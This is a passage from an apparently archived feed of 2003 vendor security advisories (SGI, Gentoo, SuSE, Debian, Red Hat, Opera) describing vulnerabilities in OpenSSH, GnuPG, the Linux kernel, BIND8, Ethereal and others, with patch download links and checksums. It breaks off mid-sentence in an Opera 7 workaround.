
Risk level: medium

Type: many types

Source of info: SGI Security Team

Impact

This is an update to SGI Security Advisory 20030904-01-P.

The original OpenSSH and OpenSSL packages did not have incremented
version numbers, so it was difficult to determine if a system was
vulnerable or fixed after the packages were installed. (SGI BUG 901671)

IRIX 6.5.20 and above include Kerberos. IRIX 6.5.19 does not have Kerberos,
so there was a conflict with the OpenSSL package. Patches are being
released to address this problem on IRIX 6.5.19. (SGI BUG 901706)

There was an additional OpenSSL ASN.1 vulnerability reported by:
http://www.uniras.gov.uk/vuls/2003/006489/openssl2.htm
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0851
which has been fixed by these updated patches. (SGI BUG 904644)

Overview

It has been reported that OpenSSH/OpenSSL that ships with IRIX has several
security vulnerabilities that may lead to root access on vulnerable systems.

1) buffer.c vulnerability fixed in OpenSSH 3.7 (CAN-2003-0693)
2) More buffer management vulnerabilities fixed in OpenSSH 3.7.1 (CAN-2003-0695)
3) Openwall's "memory" security fixes to OpenSSH 3.7.1 (CAN-2003-0682)
4) ssh-keysign cores dump on IRIX (SGI BUG 899663)
5) Multiple OpenSSL vulnerabilities in ASN.1 parsing

Please note that the OpenSSH which ships with IRIX is NOT vulnerable
to the two recent PAM vulnerabilities found in portable OpenSSH 3.7/3.7.1:
    http://www.openssh.com/txt/sshpam.adv

    * However, the Freeware OpenSSH from http://freeware.sgi.com/
    is PAM enabled and possibly vulnerable to these issues.

SGI has investigated the issue and recommends the following steps for neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures
be implemented on ALL vulnerable SGI systems.

These vulnerabilities have been corrected in future releases of IRIX.

SGI has provided a series of patches for these vulnerabilities. Our
recommendation is to upgrade to IRIX 6.5.22, or install the appropriate
patches.

SGI Freeware team has also provided an updated OpenSSH 3.7.1p2 package.
Freeware is not supported by SGI.


OS Version     Vulnerable?   Patch #     Actions
---------     -----------   -------     --------

IRIX 6.5.19m      yes         5362     Notes 1 & 2
IRIX 6.5.19f      yes         5362     Notes 1 & 2
IRIX 6.5.20m      yes         5405     Notes 1 & 2
IRIX 6.5.20f      yes         5405     Notes 1 & 2
IRIX 6.5.21m      yes         5363     Notes 1 & 2
IRIX 6.5.21f      yes         5363     Notes 1 & 2
IRIX 6.5.22       no                   Notes 1 & 2

    NOTES
     1) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact
        your SGI Support Provider or visit URL: http://support.sgi.com/

     2) Install the required patch(es) based on your operating release.

Patches

http://freeware.sgi.com/Dist/fw_openssh-3.7.1p2.tardist
http://support.sgi.com/

Gentoo's rsync rotation server (rsync.gentoo.org) compromised

2003-12-03

Risk level: low

Type: none

Source of info: GENTOO LINUX SECURITY TEAM

Impact

On December 2nd at approximately 03:45 UTC, one of the servers that makes up
the rsync.gentoo.org rotation was compromised via a remote exploit.  At this
point, Gentoo Linux Security Team are still performing forensic analysis.  However, the compromised
system had both an IDS and a file integrity checker installed and there are very detailed forensic trail of what happened once the box was breached. 
The GLS Team is reasonably confident that the portage tree stored on that box
was unaffected.  

Overview

The attacker appears to have installed a rootkit and modified/deleted some files to cover their tracks, but left the server otherwise untouched. The box
was in a compromised state for approximately one hour before it was discovered and shut down. During this time, approximately 20 users synchronized against the portage mirror stored on this box. The method used to gain access to the box remotely is still under investigation.  

This box is not an official Gentoo infrastructure box and is instead donated
by a sponsor. The box provides other services as well and the sponsor has
requested not to publicly identify the box at this time. 

Multiple bug's in GnuPG

2003-12-03

Risk level: medium

Type: cryptographic compromise

Source of info: SuSE Security Team

Impact

The gnupg (the SUSE package is named gpg) package is the most widely used software for cryptographic encryption/decryption of data.

Two independent errors have been found in gpg (GnuPG) packages: 
 A) A format string error in the client code that does key retrieval from a (public) key server
 B) A cryptographic error in gpg that results in a compromise of a cryptographic keypair if ElGamal signing keys have been used for generating the key.

Overview

 A)
    There exists a format string error in thhe client code for key retrieval from a keyserver. gpg-1.2.x version packages are affected by this vulnerability.
    The format string error can be used by an attacker performing a man-in-the-middle-attack between you and your keyserver, or by a
compromised keyserver. The result is a crash of gpg or a potential execution of arbitrary code provided by the attacker, if the keyserver is used for key retrieval at the time of the attack.

 B)
    Werner Koch, the author of the gpg package, has publicly announced a weakness in gpg that has been reported to him by Phong Nguyen: 
   ElGamal signing keys can be attacked within seconds to reveal the private key of the keypair. It is strongly advised that ElGamal signing keys should be revoked immediately. Only ElGamal keys are affected, other types are not vulnerable.

    To find out if you are using an ElGamal signing key, list your public keys using the command
         gpg --list-keys your_keyid
    Example:
    $ gpg --list-keys build@suse.de
    pub  1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build@suse.de>
    sub  2048g/8495160C 2000-10-19 [expires: 2006-02-12]
    
    If your key lists a capital "G" after the key's length (like in
    pub  1536G/...), then your key is vulnerable. A small letter "g" after
    the key length does NOT indicate any problem.
    ElGamal keys can be used for primary keys as well as for subkeys. In the
    case where only a subkey is an ElGamal key, it is sufficient to revoke
    this specific subkey.

    To revoke a key, generate a revocation certificate using the following 
    command:

         gpg --gen-revoke your_keyid > revocation_certificate.pgp

    Then, the revokation certificate must be imported into your keyring:

         gpg --import < revocation_certificate.pgp

    As your last action, send the key with its revocation certificate
    to the keyservers that know your key:

         gpg --keyserver wwwkeys.eu.pgp.net --send-keys your_keyid


    ElGamal keys can only be generated by gpg if a special option (--expert)
    has been used to reveal "expert" options, and if a warning has been
    ignored after your choice to use ElGamal keys. Such keys are rare 
    (Werner Koch reports 848 primary ElGamal signing keys and 324 vulnerable 
    subkeys on the keyservers.). Therefore, we expect that only experienced
    users of gpg may be vulnerable to the ElGamal signing key error.

    

 UPDATES:

    The nature of the ElGamal error implies that a possible compromise was 
    made possible with the generation of the key in the past already. There is
    no way that an update package can prevent the compromise. However,
    the update packages that we provide prevent the use of ElGamal signing
    keys for key generation once the packages are installed. 

    SUSE Linux 8.1 and before contain a gpg package of version 1.0.x 
    (vulnerable to the ElGamal signing key bug only), a version of 1.2.x
    has been shipped with SUSE Linux 8.2 and 9.0 (vulnerable to both errors).
    We provide update packages that fix both vulnerabilities, meaning that
    only the packages affected by both vulnerabilities are being updated.
    For this reason, there are only update packages for SuSE Linux 8.2
    and SUSE LINUX 9.0 available for download.

    Important Note:
    A proper installation of the gpg update package is critical for future
    updates on your system. The gpg program is being used by YaST Online
    Update (YOU) to verify the authenticity of your update package. A failure
    of a signature verification will result in a failure of the installation
    of update packages.

Patches

Intel i386 Platform:
    SuSE-9.0:
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/gpg-1.2.2-121.i586.rpm
      3f3513f61408128b5a95bd251540200f
    patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/gpg-1.2.2-121.i586.patch.rpm
      227002b89a49cf3581fb1fb4c185e725
    source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/gpg-1.2.2-121.src.rpm
      d3bb8845401d5e707a5da830ab209993
    SuSE-8.2:
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/gpg-1.2.2rc1-98.i586.rpm
      ff54dbcb36cf741f108bdd48d5496e5d
    patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/gpg-1.2.2rc1-98.i586.patch.rpm
      0efef8f33670349639fa5c25b3c5f3a3
    source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/gpg-1.2.2rc1-98.src.rpm
      13ee0ff9bb2137365ab91f32324a4114
    Opteron x86_64 Platform:
   SuSE-9.0:
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/gpg-1.2.2-117.x86_64.rpm
      a1679f36e00347a1adf53e2209245274
    patch rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/gpg-1.2.2-117.x86_64.patch.rpm
      f3002d4cea60bb0acea1e8bea89d46c9
    source rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/gpg-1.2.2-117.src.rpm
      50e58f6853dcd5523172cb4c07a63d89

Bugs in linux kernels

2003-12-01

Risk level: high

Type: Buffer overflow

Source of info: Debian Security Team

Impact

Recently multiple servers of the Debian project were compromised using a
Debian developers account and an unknown root exploit. Forensics
revealed a burneye encrypted exploit. Robert van der Meulen managed to
decrypt the binary which revealed a kernel exploit. Study of the exploit
by the RedHat and SuSE kernel and security teams quickly revealed that
the exploit used an integer overflow in the brk system call. Using
this bug it is possible for a userland program to trick the kernel into
giving access to the full kernel address space. This problem was found
in September by Andrew Morton, but unfortunately that was too late for
the 2.4.22 kernel release.

Overview

This bug has been fixed in kernel version 2.4.23 for the 2.4 tree and
2.6.0-test6 kernel tree. For Debian it has been fixed in version
2.4.18-12 of the kernel source packages, version 2.4.18-14 of the i386
kernel images and version 2.4.18-11 of the alpha kernel images.

Patches

Debian 3.0 (stable)
Source archives:
http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-i386_2.4.18-12.tar.gz
      Size/MD5 checksum:    69746 a4b642e03732748d6820524746ba2265
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18.orig.tar.gz
      Size/MD5 checksum: 29818323 24b4c45a04a23eb4ce465eb326a6ddf2
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-alpha_2.4.18-11.dsc
      Size/MD5 checksum:      874 6fe1a9a759850570f1609b77502c13bc
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-alpha_2.4.18-11.tar.gz
      Size/MD5 checksum:    24210 11373e2cf7e659f5a69c33f3f143fcaf
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14.dsc
      Size/MD5 checksum:      798 14840782d3ae928fd453a7dba225bb7f
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-i386_2.4.18-12.dsc
      Size/MD5 checksum:     1325 a77acb0743f3d3a16c00fa1cd4520e89
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14.diff.gz
      Size/MD5 checksum:    66878 916d16dd46c59dd4314c45e48f33f043

  Architecture independent packages:

    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-doc-2.4.18_2.4.18-14_all.deb
      Size/MD5 checksum:  1710438 5e6cb496150391a93558652c97fb214b
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.18/kernel-source-2.4.18_2.4.18-14_all.deb
      Size/MD5 checksum: 23903282 9d5cb5159bf76451dd32e75467ca6240

  alpha architecture (DEC Alpha)

    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1-smp_2.4.18-11_alpha.deb
      Size/MD5 checksum:  3514858 ec88046377537587469e5527f3633c65
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1_2.4.18-11_alpha.deb
      Size/MD5 checksum:  3362836 f91eb5ef18c3413ae200c5b1679264cc
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-headers-2.4.18-1-generic_2.4.18-11_alpha.deb
      Size/MD5 checksum:  3512244 a46de1359655b3a05c99cd8211edd41f
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-smp_2.4.18-11_alpha.deb
      Size/MD5 checksum: 12799424 966ecceeb16c5bf87cc31b9178d6add9
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-alpha/kernel-image-2.4.18-1-generic_2.4.18-11_alpha.deb
      Size/MD5 checksum: 12425696 27b4defd9326ed5bac3a765977437354

  i386 architecture (Intel ia32)

    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-k7_2.4.18-12_i386.deb
      Size/MD5 checksum:  8863312 17a9c0323f06ed3eda1d17bdaf443d50
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-k7_2.4.18-12_i386.deb
      Size/MD5 checksum:   230194 9e347c03ffaf24762ec8ad86f3c3c482
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-386_2.4.18-12_i386.deb
      Size/MD5 checksum:  8797832 00ab7c9bf64614112684e60595e1fe30
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-686-smp_2.4.18-12_i386.deb
      Size/MD5 checksum:   230960 8ba2a811fb753a4b5083254c5ab402c2
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-686_2.4.18-12_i386.deb
      Size/MD5 checksum:   227302 63e4524d17cb0dcf34774637293d2700
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-586tsc_2.4.18-12_i386.deb
      Size/MD5 checksum:  3525452 7f0208aa3bc2e9974590839d141c4ca3
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-686-smp_2.4.18-12_i386.deb
      Size/MD5 checksum:  3527346 6b321ce7efdc5d1f641ca4e14db1807e
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-386_2.4.18-12_i386.deb
      Size/MD5 checksum:   228266 e05c768db8f79e76db1dbf39200075cc
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-586tsc_2.4.18-12_i386.deb
      Size/MD5 checksum:   227834 3799038b55f03ea7fcacef73e50a7b02
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-586tsc_2.4.18-12_i386.deb
      Size/MD5 checksum:  8704448 f8531f0d6173228a2f952e4ca80ee618
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-386_2.4.18-12_i386.deb
      Size/MD5 checksum:  3524656 c40e3230e071e5917f3c82ef8d8a3b79
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-k6_2.4.18-12_i386.deb
      Size/MD5 checksum:  8661138 121c4860a88e6e0ef84941b044e655ee
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-pcmcia-modules-2.4.18-1-k6_2.4.18-12_i386.deb
      Size/MD5 checksum:   226934 f29016331da939466d99fde7e6dbf0c4
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1_2.4.18-12_i386.deb
      Size/MD5 checksum:  3431968 37d14ba3820e331c7701c6dbc65440c7
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-686_2.4.18-12_i386.deb
      Size/MD5 checksum:  3525938 0b4f3c22d96777bd95673e8c6ceb45a9
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-k7_2.4.18-12_i386.deb
      Size/MD5 checksum:  3525194 89b06e76e46487a2708317a7d2643519
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-686-smp_2.4.18-12_i386.deb
      Size/MD5 checksum:  8960026 e01cd0b938c75a247cc111855632934c
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-headers-2.4.18-1-k6_2.4.18-12_i386.deb
      Size/MD5 checksum:  3524794 43c7a34c6428e7d79fb660b4a434aaae
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.18-1-i386/kernel-image-2.4.18-1-686_2.4.18-12_i386.deb
      Size/MD5 checksum:  8703034 a6d0829412575a9f7e6c227c5275a47b

Bind 8 cache poisoning/denial-of-service

2003-11-28

Risk level: medium

Type: DoS

Source of info: SuSE Security Team

Impact

    To resolve IP addresses to host and domain names and vice versa the
    DNS service needs to be consulted. The most popular DNS software is
    the BIND8 and BIND9 suite. The BIND8 code is vulnerable to a remote
    denial-of-service attack by poisoning the cache with authoritative
    negative responses that should not be accepted otherwise.

Overview

    To resolve IP addresses to host and domain names and vice versa the
    DNS service needs to be consulted. The most popular DNS software is
    the BIND8 and BIND9 suite. The BIND8 code is vulnerable to a remote
    denial-of-service attack by poisoning the cache with authoritative
    negative responses that should not be accepted otherwise.
    To execute this attack a name-server needs to be under malicious
    control and the victim's bind8 has to query this name-server.
    The attacker can set a high TTL value to keep his negative record as
    long as possible in the cache of the victim. For this time the clients
    of the attacked site that rely on the bind8 service will not be able
    to reach the domain specified in the negative record.
    These records should disappear after the time-interval (TTL) elapsed.

    There is no temporary workaround for this bug.

    To make this update effective run "rcnamed restart" as root please.

Patches

Intel i386 Platform:
    SuSE-8.2:
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/bind8-8.3.4-64.i586.rpm
      3d44d46f0e8397c69d53e96aba9fbd6d
    patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/bind8-8.3.4-64.i586.patch.rpm
      cce1df09a0b6fb5cbbddcc462f055c64
    source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/bind8-8.3.4-64.src.rpm
      a980a0eca79de02f135fce1cbe84ee22

    SuSE-8.1:
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/bind8-8.2.4-336.i586.rpm
      4a46d0560eac1ca5de77c12f8abe4952
    patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/bind8-8.2.4-336.i586.patch.rpm
      c8020302f6f161e9d86a3f1615304a23
    source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/bind8-8.2.4-336.src.rpm
      c9ee184cbd1f1722c94de9fd66f11801

    SuSE-8.0:
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/bind8-8.2.4-334.i386.rpm
      f739fdb03a7df6685e0aa026f98a0389
    patch rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/bind8-8.2.4-334.i386.patch.rpm
      a3de26e06b689d29b4b4b08c04fa32f4
    source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/bind8-8.2.4-334.src.rpm
      85d8d9fee3c8a029263777a45b4af011

   SuSE-7.3:
ftp://ftp.suse.com/pub/suse/i386/update/7.3/n2/bind8-8.2.4-334.i386.rpm
      381c2b6f805ca30d0fefc98afaee9ba0
    source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/bind8-8.2.4-334.src.rpm
      97a87469cfb573bdd89f8f3a2c02264f

Sparc Platform:
   SuSE-7.3:
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n2/bind8-8.2.4-128.sparc.rpm
      c08454b933ed2365d9d2ab1322803af6
    source rpm(s):
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/bind8-8.2.4-128.src.rpm
      827a7f56273c7a25ac40ffba728e9150

PPC Power PC Platform:
   SuSE-7.3:
ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n2/bind8-8.2.4-243.ppc.rpm
      12f1f205c08449e945c8ad344a8e3b41
    source rpm(s):
ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/bind8-8.2.4-243.src.rpm
      177093e76b3b8d2679089a1ab1c46d0e

SGI ProPack v2.3 security update

2003-11-26

Risk level: medium

Type: Buffer overflow

Source of info: SGI Security Team

Impact

SGI has released Patch 10033: SGI ProPack v2.3 security update, which includes updated RPMs for SGI ProPack v2.3 for the Altix family of systems,
in response to the erratas released by Red Hat. 

Overview

ProPack v2.3 contains updated RPMs for stunnel  (see: https://rhn.redhat.com/errata/RHSA-2003-297.html)
and  glibc (see: https://rhn.redhat.com/errata/RHSA-2003-249.html)

SGI Security Advisories can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/advisories/

Patches

Patch 10033 is available from http://support.sgi.com/
or the individual RPMs from Patch 10033 are available from:
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/RPMS
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/SRPMS

Security problems in Ethereal 0.9.15

2003-11-24

Risk level: medium

Type: Remote code execution

Source of info: Red Hat Security Team

Impact

Ethereal is a program for monitoring network traffic.

A number of security issues affect Ethereal.  By exploiting these issues,
it may be possible to make Ethereal crash or run arbitrary code by
injecting a purposefully-malformed packet onto the wire or by convincing
someone to read a malformed packet trace file.

Overview

A buffer overflow in Ethereal 0.9.15 and earlier allows remote attackers
to cause a denial of service and possibly execute arbitrary code via a
malformed GTP MSISDN string.  The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CAN-2003-0925 to
this issue.

Ethereal 0.9.15 and earlier allows remote attackers to cause a denial of
service (crash) via certain malformed ISAKMP or MEGACO packets.  The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name
CAN-2003-0926 to this issue.

A heap-based buffer overflow in Ethereal 0.9.15 and earlier allows
remote attackers to cause a denial of service (crash) and possibly
execute arbitrary code via the SOCKS dissector.  The Common Vulnerabilities
and Exposures project (cve.mitre.org) has assigned the name CAN-2003-0927
to this issue.

Users of Ethereal should update to these erratum packages containing
Ethereal version 0.9.16, which is not vulnerable to these issues.

Patches

Before applying this update, make sure all previously released errata
relevant to your system have been applied.
Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/ethereal-0.9.16-0.72.1.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/ethereal-0.9.16-0.72.1.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/ethereal-gnome-0.9.16-0.72.1.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/ethereal-0.9.16-0.72.1.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/ethereal-gnome-0.9.16-0.72.1.ia64.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/ethereal-0.9.16-0.73.1.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/ethereal-0.9.16-0.73.1.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/ethereal-gnome-0.9.16-0.73.1.i386.rpm

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/ethereal-0.9.16-0.80.1.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/ethereal-0.9.16-0.80.1.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/ethereal-gnome-0.9.16-0.80.1.i386.rpm

Red Hat Linux 9:

SRPMS:
ftp://updates.redhat.com/9/en/os/SRPMS/ethereal-0.9.16-0.90.1.src.rpm

i386:
ftp://updates.redhat.com/9/en/os/i386/ethereal-0.9.16-0.90.1.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/ethereal-gnome-0.9.16-0.90.1.i386.rpm

Updated Pan packages fix denial of service vulnerability

2003-11-24

Risk level: low

Type: DoS

Source of info: Red Hat Security Team

Impact

Pan is a Gnome/GTK+ newsreader.

A bug in Pan versions prior to 0.13.4 can cause Pan to crash when parsing
an article header containing a very long author email address.  This bug
causes a crash (denial of service) but is not further exploitable.  The
Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2003-0855 to this issue.

Overview

Users of Pan are advised to upgrade to these erratum packages, which
contain a backported patch correcting this issue

Patches

Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/pan-0.9.7-2.71.src.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/pan-0.9.7-2.71.i386.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/pan-0.11.4-1.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/pan-0.11.4-1.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/pan-0.11.4-1.ia64.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/pan-0.11.4-1.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/pan-0.11.4-1.i386.rpm

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/pan-0.13.4-1.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/pan-0.13.4-1.i386.rpm

Red Hat Linux 9:

SRPMS:
ftp://updates.redhat.com/9/en/os/SRPMS/pan-0.14.2-1.9.src.rpm

i386:
ftp://updates.redhat.com/9/en/os/i386/pan-0.14.2-1.9.i386.rpm

Updated stunnel packages available

2003-11-24

Risk level: high

Type: many types

Source of info: Red Hat Security Team

Impact

Updated stunnel packages are now available for Red Hat Linux 7.1, 7.2, 7.3,
and 8.0 systems.  These updates address problems stemming from improper use
of non-reentrant functions in signal handlers

Overview

A previous advisory provided updated packages to address re-entrancy
problems in stunnel's signal-handling routines.  These updates did not
address other bugs that were found by Steve Grubb, and introduced an
additional bug, which was fixed in stunnel 3.26.

All users should upgrade to these errata packages, which address these
issues by updating stunnel to version 3.26.

NOTE: After upgrading, any instances of stunnel configured to run in daemon
mode should be restarted, and any active network connections that are
currently being serviced by stunnel should be terminated and reestablished.

Patches

Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/stunnel-3.26-1.7.1.src.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/stunnel-3.26-1.7.1.i386.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/stunnel-3.26-1.7.3.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/stunnel-3.26-1.7.3.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/stunnel-3.26-1.7.3.ia64.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/stunnel-3.26-1.7.3.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/stunnel-3.26-1.7.3.i386.rpm

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/stunnel-3.26-1.8.0.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/stunnel-3.26-1.8.0.i386.rpm

Updated iproute packages fix local security vulnerability

2003-11-24

Risk level: medium

Type: DoS

Source of info: Red Hat Security Team

Impact

Updated iproute packages that close a locally-exploitable denial of service
vulnerability are now available

Overview

The iproute package contains advanced IP routing and network device
configuration tools.

Herbert Xu reported that iproute can accept spoofed messages sent on the
kernel netlink interface by other users on the local machine.  This could
lead to a local denial of service attack.  The Common Vulnerabilities and
Exposures project (cve.mitre.org) has assigned the name CAN-2003-0856 to
this issue. 
 
Users of iproute should upgrade to these erratum packages, which contain a
patch that checks that netlink messages actually came from the kernel.

Patches

Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/iproute-2.4.7-7.71.1.src.rpm
ftp://updates.redhat.com/7.1/en/os/SRPMS/iproute-2.4.7-7.71ppc.1.src.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/iproute-2.4.7-7.71.1.i386.rpm

Red Hat Linux 7.1 for iSeries (64 bit):

SRPMS:
ftp://updates.redhat.com/7.1/en/os/iSeries/SRPMS/iproute-2.4.7-7.71ppc.1.src.rpm

ppc:
ftp://updates.redhat.com/7.1/en/os/iSeries/ppc/iproute-2.4.7-7.71ppc.1.ppc.rpm

Red Hat Linux 7.1 for pSeries (64 bit):

SRPMS:
ftp://updates.redhat.com/7.1/en/os/pSeries/SRPMS/iproute-2.4.7-7.71ppc.1.src.rpm

ppc:
ftp://updates.redhat.com/7.1/en/os/pSeries/ppc/iproute-2.4.7-7.71ppc.1.ppc.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/iproute-2.4.7-7.72.1.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/iproute-2.4.7-7.72.1.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/iproute-2.4.7-7.72.1.ia64.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/iproute-2.4.7-7.73.1.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/iproute-2.4.7-7.73.1.i386.rpm

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/iproute-2.4.7-7.80.1.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/iproute-2.4.7-7.80.1.i386.rpm

Red Hat Linux 9:

SRPMS:
ftp://updates.redhat.com/9/en/os/SRPMS/iproute-2.4.7-7.90.1.src.rpm

i386:
ftp://updates.redhat.com/9/en/os/i386/iproute-2.4.7-7.90.1.i386.rpm

Security hole in Opera 7

2003-11-22

Risk level: Critical

Type: remote system compromise

Source of info: Operash

Impact

Opera 7 has a serious Security-Hole in the auto-install function
  for Skin Files and Configuration Files.
  When a user goes to a malicious Web site,  attackers can exploit
  this Security-Hole and make an arbitrary file on arbitrary path
  inside of user's Local Disk from a WEB page.

Overview

Workaround
==========
Main Menu "Preferences" -> "File Types", MIME-type list;
  (check-off "Hide file types opened with Opera")

    application/x-opera-skin
    application/x-opera-configuration-skin
    application/x-opera-configuration-mouse
    application/x-opera-configuration-keyboard
    application/x-opera-configuration-toolbar
    application/x-opera-configuration-menu

  If you change the actions of all MIME types above from
